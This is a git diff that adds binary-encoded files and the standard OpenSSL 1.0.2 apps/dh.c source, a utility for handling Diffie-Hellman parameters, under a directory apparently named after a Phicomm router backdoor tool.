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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.c
new file mode 100644
index 0000000..48fecc9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.c
@@ -0,0 +1,337 @@
+/* apps/dh.c */
+/* obsoleted by dhparam.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_DH */
+#ifndef OPENSSL_NO_DH
+# include <stdio.h>
+# include <stdlib.h>
+# include <time.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/dh.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# undef PROG
+# define PROG    dh_main
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -check       - check the parameters are ok
+ * -noout
+ * -text
+ * -C
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    DH *dh = NULL;
+    int i, badops = 0, text = 0;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, check = 0, noout = 0, C = 0, ret = 1;
+    char *infile, *outfile, *prog;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine;
+# endif
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+# ifndef OPENSSL_NO_ENGINE
+    engine = NULL;
+# endif
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-check") == 0)
+            check = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-C") == 0)
+            C = 1;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg   input format - one of DER PEM\n");
+        BIO_printf(bio_err,
+                   " -outform arg  output format - one of DER PEM\n");
+        BIO_printf(bio_err, " -in arg       input file\n");
+        BIO_printf(bio_err, " -out arg      output file\n");
+        BIO_printf(bio_err, " -check        check the DH parameters\n");
+        BIO_printf(bio_err,
+                   " -text         print a text form of the DH parameters\n");
+        BIO_printf(bio_err, " -C            Output C code\n");
+        BIO_printf(bio_err, " -noout        no output\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e     use engine e, possibly a hardware device.\n");
+# endif
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (informat == FORMAT_ASN1)
+        dh = d2i_DHparams_bio(in, NULL);
+    else if (informat == FORMAT_PEM)
+        dh = PEM_read_bio_DHparams(in, NULL, NULL, NULL);
+    else {
+        BIO_printf(bio_err, "bad input format specified\n");
+        goto end;
+    }
+    if (dh == NULL) {
+        BIO_printf(bio_err, "unable to load DH parameters\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (text) {
+        DHparams_print(out, dh);
+# ifdef undef
+        printf("p=");
+        BN_print(stdout, dh->p);
+        printf("\ng=");
+        BN_print(stdout, dh->g);
+        printf("\n");
+        if (dh->length != 0)
+            printf("recommended private length=%ld\n", dh->length);
+# endif
+    }
+
+    if (check) {
+        if (!DH_check(dh, &i)) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (i & DH_CHECK_P_NOT_PRIME)
+            printf("p value is not prime\n");
+        if (i & DH_CHECK_P_NOT_SAFE_PRIME)
+            printf("p value is not a safe prime\n");
+        if (i & DH_UNABLE_TO_CHECK_GENERATOR)
+            printf("unable to check the generator value\n");
+        if (i & DH_NOT_SUITABLE_GENERATOR)
+            printf("the g value is not a generator\n");
+        if (i == 0)
+            printf("DH parameters appear to be ok.\n");
+    }
+    if (C) {
+        unsigned char *data;
+        int len, l, bits;
+
+        len = BN_num_bytes(dh->p);
+        bits = BN_num_bits(dh->p);
+        data = (unsigned char *)OPENSSL_malloc(len);
+        if (data == NULL) {
+            perror("OPENSSL_malloc");
+            goto end;
+        }
+        l = BN_bn2bin(dh->p, data);
+        printf("static unsigned char dh%d_p[]={", bits);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t};\n");
+
+        l = BN_bn2bin(dh->g, data);
+        printf("static unsigned char dh%d_g[]={", bits);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t};\n\n");
+
+        printf("DH *get_dh%d()\n\t{\n", bits);
+        printf("\tDH *dh;\n\n");
+        printf("\tif ((dh=DH_new()) == NULL) return(NULL);\n");
+        printf("\tdh->p=BN_bin2bn(dh%d_p,sizeof(dh%d_p),NULL);\n",
+               bits, bits);
+        printf("\tdh->g=BN_bin2bn(dh%d_g,sizeof(dh%d_g),NULL);\n",
+               bits, bits);
+        printf("\tif ((dh->p == NULL) || (dh->g == NULL))\n");
+        printf("\t\treturn(NULL);\n");
+        printf("\treturn(dh);\n\t}\n");
+        OPENSSL_free(data);
+    }
+
+    if (!noout) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_DHparams_bio(out, dh);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_DHparams(out, dh);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write DH parameters\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dh != NULL)
+        DH_free(dh);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else                           /* !OPENSSL_NO_DH */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.o
new file mode 100644
index 0000000000000000000000000000000000000000..a7eda12f7facd48be583816efdcf3412dcab4989
GIT binary patch
literal 10728
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
